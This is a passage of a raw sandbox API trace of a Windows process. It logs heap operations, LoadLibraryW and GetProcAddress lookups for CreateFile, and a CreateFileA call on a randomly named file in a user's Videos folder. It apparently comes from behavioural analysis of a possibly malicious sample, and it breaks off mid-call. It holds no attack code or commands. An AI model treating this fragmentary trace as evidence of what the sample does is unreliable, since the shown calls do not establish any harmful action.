dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.789] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.790] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.790] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.790] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.790] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.793] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.795] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd60 [0042.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.796] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0042.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.796] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0042.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3688 [0042.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", cchWideChar=74, lpMultiByteStr=0x7f3688, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpUsedDefaultChar=0x0) returned 74 [0042.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.798] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS 